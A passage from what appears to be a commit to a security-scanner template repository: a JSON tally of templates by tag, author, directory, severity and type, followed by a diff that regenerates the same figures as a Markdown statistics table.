dobe","count":12},{"name":"dns","count":12},{"name":"weblogic","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"fuzz","count":11},{"name":"joomla","count":11},{"name":"php","count":11},{"name":"router","count":11},{"name":"cve2013","count":11},{"name":"magento","count":9},{"name":"cnvd","count":8},{"name":"xxe","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"ftp","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"vmware","count":7},{"name":"cve2009","count":7},{"name":"login","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"laravel","count":6},{"name":"coldfusion","count":6},{"name":"backup","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"cve2010","count":6},{"name":"jetty","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"google","count":6},{"name":"solr","count":6},{"name":"dell","count":6},{"name":"drupal","count":5},{"name":"ibm","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"files","count":5},{"name":"fileupload","count":5},{"name":"java","count":5},{"name":"django","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"wp-theme","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"windows","count":4},{"name":"vpn","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"webserver","count":4},{"name":"docker","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"tomcat","count":4},{"name":"zimbra","count":4},{"name":"crlf","count":4},{"name":"solarwinds","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"hongdian","count":4},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"lfr","count":3},{"name":"printer","count":3},{"name":"zabbix","count":3},{"name":"r-seenet","count":3},{"name":"symfony","count":3},{"name":"cve2008","count":3},{"name":"ofbiz","count":3},{"name":"openssh","count":3},{"name":"git","count":3},{"name":"vbulletin","count":3},{"name":"tikiwiki","count":3},{"name":"fanruan","count":3},{"name":"grafana","count":3},{"name":"ssh","count":3},{"name":"backups","count":3},{"name":"microstrategy","count":3},{"name":"oa","count":3},{"name":"microsoft","count":3},{"name":"caucho","count":3},{"name":"zhiyuan","count":3},{"name":"wso2","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"ebs","count":3},{"name":"resin","count":3},{"name":"bitrix","count":3},{"name":"nacos","count":3},{"name":"itop","count":3},{"name":"terramaster","count":3},{"name":"opensis","count":3},{"name":"kevinlab","count":3},{"name":"hp","count":3},{"name":"springcloud","count":3},{"name":"mongodb","count":3},{"name":"log","count":3},{"name":"httpd","count":3},{"name":"fpd","count":3},{"name":"targa","count":3},{"name":"rstudio","count":2},{"name":"leak","count":2},{"name":"smtp","count":2},{"name":"bigip","count":2},{"name":"splunk","count":2},{"name":"nagios","count":2},{"name":"injection","count":2},{"name":"chiyu","count":2},{"name":"github","count":2},{"name":"avantfax","count":2},{"name":"linkerd","count":2},{"name":"webcam","count":2},{"name":"vrealize","count":2},{"name":"frp","count":2},{"name":"backdoor","count":2},{"name":"pega","count":2},{"name":"couchdb","count":2},{"name":"showdoc","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"xxljob","count":2},{"name":"yapi","count":2},{"name":"wordfence","count":2},{"name":"status","count":2},{"name":"trixbox","count":2},{"name":"horde","count":2},{"name":"rockethchat","count":2},{"name":"globalprotect","count":2},{"name":"chamilo","count":2},{"name":"nextjs","count":2},{"name":"emerge","count":2},{"name":"paloalto","count":2},{"name":"sonarqube","count":2},{"name":"phpcollab","count":2},{"name":"voipmonitor","count":2},{"name":"hashicorp","count":2},{"name":"mida","count":2},{"name":"intrusive","count":2},{"name":"guacamole","count":2},{"name":"kentico","count":2},{"name":"sonicwall","count":2},{"name":"natshell","count":2},{"name":"grav","count":2},{"name":"openfire","count":2},{"name":"hjtcloud","count":2},{"name":"cve2007","count":2},{"name":"spark","count":2},{"name":"oauth","count":2},{"name":"cve2005","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"glassfish","count":2},{"name":"cache","count":2},{"name":"odoo","count":2},{"name":"strapi","count":2},{"name":"smb","count":2},{"name":"ecology","count":2},{"name":"fortios","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"seeyon","count":2},{"name":"saltstack","count":2},{"name":"igs","count":2},{"name":"proxy","count":2},{"name":"akamai","count":2},{"name":"activemq","count":2},{"name":"hpe","count":2},{"name":"flir","count":2},{"name":"rockmongo","count":2},{"name":"icewarp","count":2},{"name":"jsf","count":2},{"name":"prometheus","count":2},{"name":"jellyfin","count":2},{"name":"kibana","count":2},{"name":"hasura","count":2},{"name":"nexus","count":2},{"name":"mail","count":2},{"name":"openam","count":2},{"name":"dolibarr","count":2},{"name":"huawei","count":2},{"name":"ucmdb","count":2},{"name":"waf","count":2},{"name":"jboss","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"azure","count":2},{"name":"dos","count":2},{"name":"telerik","count":2},{"name":"jeedom","count":2},{"name":"fortigates","count":1},{"name":"nette","count":1},{"name":"nps","count":1},{"name":"mantis","count":1},{"name":"redwood","count":1},{"name":"tika","count":1},{"name":"codemeter","count":1},{"name":"maccmsv10","count":1},{"name":"cse","count":1},{"name":"glpi","count":1},{"name":"gloo","count":1},{"name":"npm","count":1},{"name":"alibaba","count":1},{"name":"ganglia","count":1},{"name":"rsyncd","count":1},{"name":"shopware","count":1},{"name":"octobercms","count":1},{"name":"accela","count":1},{"name":"alerta","count":1},{"name":"fuelcms","count":1},{"name":"appweb","count":1},{"name":"sqlite","count":1},{"name":"addpac","count":1},{"name":"getsimple","count":1},{"name":"rdp","count":1},{"name":"domxss","count":1},{"name":"st","count":1},{"name":"kerbynet","count":1},{"name":"bigbluebutton","count":1},{"name":"commscope","count":1},{"name":"ntopng","count":1},{"name":"javamelody","count":1},{"name":"jenkin","count":1},{"name":"dnssec","count":1},{"name":"oscommerce","count":1},{"name":"zend","count":1},{"name":"sentry","count":1},{"name":"zmanda","count":1},{"name":"springframework","count":1},{"name":"emc","count":1},{"name":"scs","count":1},{"name":"exposures","count":1},{"name":"mcafee","count":1},{"name":"panos","count":1},{"name":"qdpm","count":1},{"name":"sourcebans","count":1},{"name":"scimono","count":1},{"name":"huijietong","count":1},{"name":"esmtp","count":1},{"name":"codeigniter","count":1},{"name":"traefik","count":1},{"name":"manageengine","count":1},{"name":"jfrog","count":1},{"name":"lotuscms","count":1},{"name":"node","count":1},{"name":"2014","count":1},{"name":"xmlchart","count":1},{"name":"fastcgi","count":1},{"name":"landrayoa","count":1},{"name":"sitecore","count":1},{"name":"ruby","count":1},{"name":"wiki","count":1},{"name":"embedthis","count":1},{"name":"acme","count":1},{"name":"moin","count":1},{"name":"javafaces","count":1},{"name":"liferay","count":1},{"name":"geutebruck","count":1},{"name":"ssl","count":1},{"name":"tensorboard","count":1},{"name":"visionhub","count":1},{"name":"lutron","count":1},{"name":"soar","count":1},{"name":"salesforce","count":1},{"name":"aspnuke","count":1},{"name":"achecker","count":1},{"name":"kyan","count":1},{"name":"blackboard","count":1},{"name":"enum","count":1},{"name":"upload","count":1},{"name":"idemia","count":1},{"name":"netsweeper","count":1},{"name":"wavemaker","count":1},{"name":"sprintful","count":1},{"name":"csrf","count":1},{"name":"zm","count":1},{"name":"webui","count":1},{"name":"email","count":1},{"name":"drone","count":1},{"name":"grails","count":1},{"name":"shopxo","count":1},{"name":"cve2006","count":1},{"name":"magicflow","count":1},{"name":"powercreator","count":1},{"name":"mariadb","count":1},{"name":"octoprint","count":1},{"name":"avalanche","count":1},{"name":"twitter-server","count":1},{"name":"livezilla","count":1},{"name":"xunchi","count":1},{"name":"woocomernce","count":1},{"name":"gotmls","count":1},{"name":"spf","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"harbor","count":1},{"name":"stem","count":1},{"name":"auth","count":1},{"name":"xff","count":1},{"name":"prestashop","count":1},{"name":"lanproxy","count":1},{"name":"netis","count":1},{"name":"mediumish","count":1},{"name":"fortiweb","count":1},{"name":"extractor","count":1},{"name":"opentsdb","count":1},{"name":"dom","count":1},{"name":"linux","count":1},{"name":"dvwa","count":1},{"name":"lansweeper","count":1},{"name":"setup","count":1},{"name":"dotnet","count":1},{"name":"axis","count":1},{"name":"episerver","count":1},{"name":"fastapi","count":1},{"name":"cocoon","count":1},{"name":"floc","count":1},{"name":"discord","count":1},{"name":"redcap","count":1},{"name":"payara","count":1},{"name":"ems","count":1},{"name":"pyramid","count":1},{"name":"cofax","count":1},{"name":"mdb","count":1},{"name":"bitly","count":1},{"name":"discourse","count":1},{"name":"interlib","count":1},{"name":"duomicms","count":1},{"name":"vnc","count":1},{"name":"k8","count":1},{"name":"ec2","count":1},{"name":"upnp","count":1},{"name":"ricoh","count":1},{"name":"comodo","count":1},{"name":"zenario","count":1},{"name":"checkpoint","count":1},{"name":"wildfly","count":1},{"name":"cherokee","count":1},{"name":"optiLink","count":1},{"name":"mpsec","count":1},{"name":"opensmtpd","count":1},{"name":"yii","count":1},{"name":"mongo","count":1},{"name":"bookstack","count":1},{"name":"nc2","count":1},{"name":"subrion","count":1},{"name":"htmli","count":1},{"name":"labtech","count":1},{"name":"jeewms","count":1},{"name":"flink","count":1},{"name":"netrc","count":1},{"name":"webmin","count":1},{"name":"dvr","count":1},{"name":"nweb2fax","count":1},{"name":"darkstat","count":1},{"name":"jsp","count":1},{"name":"wmt","count":1},{"name":"goahead","count":1},{"name":"arl","count":1},{"name":"viewpoint","count":1},{"name":"spip","count":1},{"name":"hadoop","count":1},{"name":"ghost","count":1},{"name":"opensns","count":1},{"name":"smartsense","count":1},{"name":"keenetic","count":1},{"name":"servicedesk","count":1},{"name":"seacms","count":1},{"name":"thinkadmin","count":1},{"name":"glances","count":1},{"name":"hiboss","count":1},{"name":"ruckus","count":1},{"name":"clave","count":1},{"name":"ilo4","count":1},{"name":"firebase","count":1},{"name":"tensorflow","count":1},{"name":"jnoj","count":1},{"name":"svnserve","count":1},{"name":"openemr","count":1},{"name":"resourcespace","count":1},{"name":"wondercms","count":1},{"name":"redhat","count":1},{"name":"yachtcontrol","count":1},{"name":"cerebro","count":1},{"name":"cloudinary","count":1},{"name":"servicenow","count":1},{"name":"api-manager","count":1},{"name":"acontent","count":1},{"name":"argussurveillance","count":1},{"name":"exchange","count":1},{"name":"lighttpd","count":1},{"name":"clockwatch","count":1},{"name":"empirecms","count":1},{"name":"favicon","count":1},{"name":"chinaunicom","count":1},{"name":"avtech","count":1},{"name":"ulterius","count":1},{"name":"concrete","count":1},{"name":"chevereto","count":1},{"name":"rhymix","count":1},{"name":"mautic","count":1},{"name":"panabit","count":1},{"name":"weiphp","count":1},{"name":"eprints","count":1},{"name":"zookeeper","count":1},{"name":"expressjs","count":1},{"name":"svn","count":1},{"name":"diris","count":1},{"name":"rabbitmq","count":1},{"name":"kong","count":1},{"name":"gespage","count":1},{"name":" default-login","count":1},{"name":"openrestry","count":1},{"name":"blind","count":1},{"name":"gitlist","count":1},{"name":"apos","count":1},{"name":"portainer","count":1},{"name":"ns","count":1},{"name":"adminer","count":1},{"name":"saltapi","count":1},{"name":"linkedin","count":1},{"name":"razor","count":1},{"name":"tamronos","count":1},{"name":"openx","count":1},{"name":"druid","count":1},{"name":"mysql","count":1},{"name":"kubeflow","count":1},{"name":"visualtools","count":1},{"name":"ueditor","count":1},{"name":"haproxy","count":1},{"name":"fortinet","count":1},{"name":"default","count":1},{"name":"opm","count":1},{"name":"vscode","count":1},{"name":"wamp","count":1},{"name":"myucms","count":1},{"name":"zcms","count":1},{"name":"spectracom","count":1},{"name":"tieline","count":1},{"name":"pippoint","count":1},{"name":"timeclock","count":1},{"name":"eyou","count":1},{"name":"robomongo","count":1},{"name":"rmc","count":1},{"name":"viewlinc","count":1},{"name":"sangfor","count":1},{"name":"totaljs","count":1},{"name":"mantisbt","count":1},{"name":"netdata","count":1},{"name":"wifisky","count":1},{"name":"solman","count":1},{"name":"nexusdb","count":1},{"name":"fortilogger","count":1},{"name":"linksys","count":1},{"name":"dotclear","count":1},{"name":"xml","count":1},{"name":"sgp","count":1},{"name":"tenda","count":1},{"name":"wazuh","count":1},{"name":"erp-nc","count":1},{"name":"mirai","count":1},{"name":"circontrol","count":1},{"name":"ioncube","count":1},{"name":"nedi","count":1},{"name":"monitorr","count":1},{"name":"wooyun","count":1},{"name":"opencast","count":1},{"name":"feifeicms","count":1},{"name":"froxlor","count":1},{"name":"bedita","count":1},{"name":"cgi","count":1},{"name":"tongda","count":1},{"name":"krweb","count":1},{"name":"nomad","count":1},{"name":"plastic","count":1},{"name":"dotnetnuke","count":1},{"name":"ssltls","count":1},{"name":"plc","count":1},{"name":"qvisdvr","count":1},{"name":"spring","count":1},{"name":"cobub","count":1},{"name":"realteo","count":1},{"name":"zte","count":1},{"name":"pagespeed","count":1},{"name":"triconsole","count":1},{"name":"bullwark","count":1},{"name":"sco","count":1},{"name":"centos","count":1},{"name":"influxdb","count":1},{"name":"ambari","count":1},{"name":"alertmanager","count":1},{"name":"biometrics","count":1},{"name":"trilithic","count":1},{"name":"apiman","count":1},{"name":"lg-nas","count":1},{"name":"beanshell","count":1},{"name":"centreon","count":1},{"name":"k8s","count":1},{"name":"fedora","count":1},{"name":"rfi","count":1},{"name":"proftpd","count":1},{"name":"faraday","count":1},{"name":"parentlink","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"wing-ftp","count":1},{"name":"acexy","count":1},{"name":"klog","count":1},{"name":"cors","count":1},{"name":"openerp","count":1},{"name":"etouch","count":1},{"name":"db","count":1},{"name":"gridx","count":1},{"name":"phpunit","count":1},{"name":"pacsone","count":1},{"name":"node-red-dashboard","count":1},{"name":"starttls","count":1},{"name":"plugin","count":1},{"name":"webmodule-ee","count":1},{"name":"szhe","count":1},{"name":"plone","count":1},{"name":"pulsesecure","count":1},{"name":"cloudflare","count":1},{"name":"mongoshake","count":1},{"name":"circontrorl","count":1},{"name":"phpinfo","count":1},{"name":"sage","count":1},{"name":"mara","count":1},{"name":"jenzabar","count":1},{"name":"rmi","count":1},{"name":"blue-ocean","count":1},{"name":"selea","count":1},{"name":"nsasg","count":1},{"name":"turbocrm","count":1},{"name":"kafdrop","count":1},{"name":"majordomo2","count":1},{"name":"bolt","count":1},{"name":"zzzcms","count":1},{"name":"cacti","count":1},{"name":"csod","count":1},{"name":"sceditor","count":1},{"name":"tpshop","count":1},{"name":"nuxeo","count":1},{"name":"h3c-imc","count":1},{"name":"monitorix","count":1},{"name":"jquery","count":1},{"name":"synnefo","count":1},{"name":"finereport","count":1},{"name":"vsphere","count":1},{"name":"tapestry","count":1},{"name":"anchorcms","count":1},{"name":"uwsgi","count":1},{"name":"ecom","count":1},{"name":"sarg","count":1},{"name":"websvn","count":1},{"name":"redis","count":1},{"name":"memcached","count":1},{"name":"webftp","count":1},{"name":"doh","count":1},{"name":"metinfo","count":1},{"name":"nuuo","count":1},{"name":"yealink","count":1},{"name":"exacqvision","count":1},{"name":"expose","count":1},{"name":"sureline","count":1},{"name":"gateone","count":1},{"name":"clink-office","count":1},{"name":"tileserver","count":1},{"name":"b2evolution","count":1},{"name":"phpfusion","count":1},{"name":"phalcon","count":1},{"name":"heroku","count":1},{"name":"landray","count":1},{"name":"timesheet","count":1},{"name":"zyxel","count":1},{"name":"nordex","count":1},{"name":"lancom","count":1},{"name":"calendarix","count":1},{"name":"enumeration","count":1},{"name":"xvr","count":1},{"name":"wuzhicms","count":1},{"name":"vsftpd","count":1},{"name":"javascript","count":1},{"name":"qsan","count":1},{"name":"mobileiron","count":1},{"name":"rujjie","count":1},{"name":"swagger","count":1},{"name":"crm","count":1},{"name":"geddy","count":1},{"name":"postmessage","count":1},{"name":"emby","count":1},{"name":"hortonworks","count":1},{"name":"skywalking","count":1},{"name":"spidercontrol","count":1},{"name":"bash","count":1},{"name":"xdcms","count":1},{"name":"aruba","count":1},{"name":"webadmin","count":1},{"name":"camunda","count":1},{"name":"primetek","count":1},{"name":"office365","count":1},{"name":"jmx","count":1},{"name":"aura","count":1},{"name":"iptime","count":1},{"name":"moinmoin","count":1},{"name":"flash","count":1},{"name":"dompdf","count":1},{"name":"expn","count":1},{"name":"bruteforce","count":1},{"name":"qcubed","count":1},{"name":"perl","count":1},{"name":"gogs","count":1},{"name":"fiori","count":1},{"name":"zeroshell","count":1},{"name":"openstack","count":1},{"name":"pgadmin","count":1},{"name":"postgres","count":1},{"name":"74cms","count":1},{"name":"zarafa","count":1},{"name":"wavlink","count":1},{"name":"fortigate","count":1},{"name":"sidekiq","count":1},{"name":"xiuno","count":1},{"name":"jitsi","count":1},{"name":"rubedo","count":1}],"authors":[{"name":"pikpikcu","count":234},{"name":"dhiyaneshdk","count":234},{"name":"pdteam","count":191},{"name":"daffainfo","count":128},{"name":"geeknik","count":127},{"name":"dwisiswant0","count":127},{"name":"gy741","count":62},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":40},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":17},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"r3dg33k","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"nadino","count":8},{"name":"iamthefrogy","count":8},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"emadshanab","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"meme-lord","count":5},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"mavericknerd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"joeldeleep","count":2},{"name":"unstabl3","count":2},{"name":"x1m_martijn","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"fabaff","count":2},{"name":"pxmme1337","count":2},{"name":"0xprial","count":2},{"name":"sushantkamble","count":2},{"name":"random-robbie","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"lotusdll","count":2},{"name":"randomrobbie","count":2},{"name":"kiblyn11","count":2},{"name":"incogbyte","count":2},{"name":"nkxxkn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"koti2","count":2},{"name":"ehsahil","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"swissky","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"lu4nx","count":2},{"name":"zomsop82","count":2},{"name":"hahwul","count":2},{"name":"bsysop","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"amsda","count":2},{"name":"hetroublemakr","count":2},{"name":"vavkamil","count":2},{"name":"alifathi-h1","count":2},{"name":"w4cky_","count":2},{"name":"gal nagli","count":2},{"name":"c3l3si4n","count":1},{"name":"ldionmarcil","count":1},{"name":"thevillagehacker","count":1},{"name":"divya_mudgal","count":1},{"name":"kabirsuda","count":1},{"name":"_c0wb0y_","count":1},{"name":"akash.c","count":1},{"name":"ahmed sherif","count":1},{"name":"furkansenan","count":1},{"name":"ajaysenr","count":1},{"name":"retr0","count":1},{"name":"mohammedsaneem","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"d0rkerdevil","count":1},{"name":"jteles","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"luskabol","count":1},{"name":"vzamanillo","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"mhdsamx","count":1},{"name":"ipanda","count":1},{"name":"fopina","count":1},{"name":"absshax","count":1},{"name":"berkdusunur","count":1},{"name":"andysvints","count":1},{"name":"akshansh","count":1},{"name":"notsoevilweasel","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"0xtavian","count":1},{"name":"streetofhackerr007","count":1},{"name":"sicksec","count":1},{"name":"shifacyclewla","count":1},{"name":"whynotke","count":1},{"name":"elmahdi","count":1},{"name":"co0nan","count":1},{"name":"hanlaomo","count":1},{"name":"sullo","count":1},{"name":"alph4byt3","count":1},{"name":"noamrathaus","count":1},{"name":"bernardofsr","count":1},{"name":"b4uh0lz","count":1},{"name":"j33n1k4","count":1},{"name":"luci","count":1},{"name":"pdp","count":1},{"name":"52971","count":1},{"name":"patralos","count":1},{"name":"undefl0w","count":1},{"name":"petruknisme","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"jeya seelan","count":1},{"name":"bjhulst","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"0ut0fb4nd","count":1},{"name":"andirrahmani1","count":1},{"name":"wabafet","count":1},{"name":"un-fmunozs","count":1},{"name":"zandros0","count":1},{"name":"ooooooo_q","count":1},{"name":"tirtha_mandal","count":1},{"name":"huowuzhao","count":1},{"name":"revblock","count":1},{"name":"omarkurt","count":1},{"name":"sshell","count":1},{"name":"johnjhacking","count":1},{"name":"mubassirpatel","count":1},{"name":"adrianmf","count":1},{"name":"elder tao","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"aresx","count":1},{"name":"bad5ect0r","count":1},{"name":"bolli95","count":1},{"name":"regala_","count":1},{"name":"0h1in9e","count":1},{"name":"iampritam","count":1},{"name":"shelld3v","count":1},{"name":"kareemse1im","count":1},{"name":"pratik khalane","count":1},{"name":"daviey","count":1},{"name":"arcc","count":1},{"name":"flag007","count":1},{"name":"@dwisiswant0","count":1},{"name":"r3naissance","count":1},{"name":"taielab","count":1},{"name":"gboddin","count":1},{"name":"th3.d1p4k","count":1},{"name":"smaranchand","count":1},{"name":"qlkwej","count":1},{"name":"johnk3r","count":1},{"name":"tim_koopmans","count":1},{"name":"yavolo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"micha3lb3n","count":1},{"name":"philippdelteil","count":1},{"name":"ilovebinbash","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"apt-mirror","count":1},{"name":"shreyapohekar","count":1},{"name":"sickwell","count":1},{"name":"sy3omda","count":1},{"name":"zhenwarx","count":1},{"name":"naglinagli","count":1},{"name":"mah3sec_","count":1},{"name":"dawid czarnecki","count":1},{"name":"schniggie","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"affix","count":1},{"name":"chron0x","count":1},{"name":"remonsec","count":1},{"name":"ohlinge","count":1},{"name":"willd96","count":1},{"name":"_darrenmartyn","count":1},{"name":"rodnt","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"cookiehanhoan","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"geraldino2","count":1},{"name":"manuelbua","count":1},{"name":"udyz","count":1},{"name":"b0yd","count":1},{"name":"me9187","count":1},{"name":"thezakman","count":1},{"name":"kurohost","count":1},{"name":"blckraven","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"pudsec","count":1},{"name":"rtcms","count":1},{"name":"makyotox","count":1},{"name":"its0x08","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0xteles","count":1},{"name":"_harleo","count":1},{"name":"alex","count":1},{"name":"dogasantos","count":1},{"name":"defr0ggy","count":1},{"name":"juicypotato1","count":1},{"name":"0xrod","count":1},{"name":"mass0ma","count":1},{"name":"idealphase","count":1},{"name":"alperenkesk","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"mesaglio","count":1},{"name":"rojanrijal","count":1},{"name":"hakluke","count":1},{"name":"raesene","count":1},{"name":"knassar702","count":1},{"name":"yashgoti","count":1}],"directory":[{"name":"cves","count":583},{"name":"vulnerabilities","count":262},{"name":"exposed-panels","count":216},{"name":"exposures","count":174},{"name":"technologies","count":158},{"name":"misconfiguration","count":124},{"name":"takeovers","count":70},{"name":"default-logins","count":50},{"name":"file","count":46},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":8},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":577},{"name":"high","count":457},{"name":"medium","count":385},{"name":"critical","count":218},{"name":"low","count":156}],"types":[{"name":"http","count":1696},{"name":"file","count":46},{"name":"network","count":35},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 3922025efe..c146e94e23 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,698 +1,698 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 576 | pikpikcu | 234 | Users | 1828 | info | 577 | http | 1696 | -| panel | 214 | dhiyaneshdk | 234 | | | high | 457 | file | 46 | -| xss | 213 | pdteam | 191 | | | medium | 385 | network | 35 | -| wordpress | 198 | daffainfo | 128 | | | critical | 218 | dns | 11 | -| exposure | 196 | dwisiswant0 | 127 | | | low | 156 | | | -| rce | 183 | geeknik | 127 | | | | | | | -| lfi | 168 | gy741 | 62 | | | | | | | -| cve2020 | 155 | madrobot | 60 | | | | | | | -| wp-plugin | 133 | princechaddha | 53 | | | | | | | -| tech | 100 | gaurang | 42 | | | | | | | -| cve2021 | 92 | pussycat0x | 40 | | | | | | | -| config | 91 | ice3man | 26 | | | | | | | -| cve2019 | 86 | organiccrap | 24 | | | | | | | -| cve2018 | 74 | 0x_akoko | 23 | | | | | | | -| takeover | 73 | philippedelteil | 17 | | | | | | | -| | 65 | sheikhrishad | 15 | | | | | | | -| token | 64 | milo2012 | 14 | | | | | | | -| apache | 64 | techbrunchfr | 13 | | | | | | | -| default-login | 54 | pr3r00t | 13 | | | | | | | -| cve2017 | 47 | suman_kar | 12 | | | | | | | -| file | 46 | cyllective | 11 | | | | | | | -| iot | 44 | righettod | 10 | | | | | | | -| unauth | 42 | random_robbie | 10 | | | | | | | -| oob | 41 | hackergautam | 9 | | | | | | | -| sqli | 35 | r3dg33k | 9 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| ssrf | 30 | melbadry9 | 8 | | | | | | | -| cve2016 | 30 | that_juan_ | 8 | | | | | | | -| logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | nadino | 8 | | | | | | | -| workflow | 29 | iamthefrogy | 8 | | | | | | | -| misc | 27 | 0x240x23elu | 7 | | | | | | | -| jira | 26 | kophjager007 | 7 | | | | | | | -| atlassian | 26 | oppsec | 7 | | | | | | | -| redirect | 25 | emadshanab | 7 | | | | | | | -| listing | 24 | harshbothra_ | 7 | | | | | | | -| aem | 19 | randomstr1ng | 7 | | | | | | | -| cisco | 18 | dr_set | 7 | | | | | | | -| cve2015 | 18 | techryptic (@tech) | 7 | | | | | | | -| sap | 18 | caspergn | 6 | | | | | | | -| disclosure | 17 | puzzlepeaches | 6 | | | | | | | -| springboot | 15 | __fazal | 6 | | | | | | | -| cve2014 | 14 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | joanbono | 5 | | | | | | | -| debug | 14 | yanyun | 5 | | | | | | | -| cve2011 | 13 | meme-lord | 5 | | | | | | | -| android | 13 | pentest_swissky | 5 | | | | | | | -| auth-bypass | 13 | iamnoooob | 5 | | | | | | | -| misconfig | 13 | ganofins | 5 | | | | | | | -| struts | 13 | rootxharsh | 5 | | | | | | | -| weblogic | 12 | e_schultze_ | 4 | | | | | | | -| dlink | 12 | github.com/its0x08 | 4 | | | | | | | -| adobe | 12 | xelkomy | 4 | | | | | | | -| jenkins | 12 | elsfa7110 | 4 | | | | | | | -| dns | 12 | nodauf | 4 | | | | | | | -| joomla | 11 | jarijaas | 3 | | | | | | | -| devops | 11 | tess | 3 | | | | | | | -| php | 11 | emenalf | 3 | | | | | | | -| zoho | 11 | dudez | 3 | | | | | | | 